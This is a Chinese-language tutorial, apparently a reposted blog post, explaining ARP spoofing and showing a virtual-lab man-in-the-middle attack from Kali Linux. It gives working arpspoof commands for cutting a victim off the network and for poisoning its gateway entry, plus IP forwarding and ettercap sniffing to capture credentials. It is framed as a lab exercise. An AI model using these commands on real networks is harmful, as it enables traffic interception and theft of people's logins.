用Kali实现局域网内ARP欺骗和中间人攻击

用Kali实现局域网内ARP欺骗和中间人攻击,第1张

用Kali实现局域网内ARP欺骗和中间人攻击

我们先介绍一下什么是中间人攻击,什么是ARP协议和什么是ARP欺骗:

什么是中间人攻击:中间人攻击是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”

什么是ARP协议:ARP协议准确的来说是ARP地址解析协议。


ARP是指根据IP地址获取物理地址的一个TCP/IP协议。


主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。


通俗的说,DNS是域名与IP对应的协议,而ARP是IP与mac(物理地址)对应的协议,DNS常用于主机与外网机器连接时进行地址转换,而ARP多用于内网机器通信时地址的转换

什么是ARP欺骗:ARP欺骗就是通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。


此种攻击可让攻击者获取局域网上的数据包甚至可以嗅探、篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。


   下面开始实验:

我们先搭建一个虚拟环境(警告不要在真实条件下做):

攻击机 kali IP:192.168.220.148

被攻击机 Windows10 IP:192.168.220.153

第一步查看IP和网关

Kali输入命令: ifconfig ,route -n

Windows输入命令:ipconfig

第二步,利用nmap 查看同网段下(192.168.220.0/24)的所有活跃IP 使用命令 nmap 192.169.220.0/24。


确认被攻击机的IP地址。


先实行断网攻击,先在被攻击机上输入命令:ping www.baidu.com  试一下网络的连通性,测试好可以ping通。


说明网络是正常的。


然后我们开始实施断网攻击 在kali里使用arpspoof软件,输入命令:arpspoof -i eth0 -t 192.168.220.153 192.168.220.2 然后被攻击机ping不通显示断网,将攻击机命令终止,再次尝试发现ping通了。


实施断网成功

第四步断网不是我们的目的,我们的目的是实施ARP欺骗和中间人攻击。


首先,我们要使用的工具还是arpspoof,因为我们此次攻击方式是欺骗,同时,我们还是用eteercap 去嗅探目标靶子的流量,来获取目标的重要信息。


但是,首先要开始IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。


默认为0,接下来修改为1

输入命令为:echo 1 > /proc/sys/net/ipv4/ip_forward 然后输入命令查看:cat /proc/sys/net/ipv4/ip_forward 看看有没有改。


然后输入命令:arpspoof -i eth0 -t 192.168.220.153 192.168.220.2  发起攻击

此时欺骗成功,接下来我们使用ettercap嗅探 输入命令:ettercap -Tq -i eth0  嗅探成功。


因为虚拟机所以没有什么账号和密码可以抓。


                                                                                                本文只做实验教程,请勿做他用

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/564376.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-06
下一篇 2022-04-06

发表评论

登录后才能评论

评论列表(0条)

保存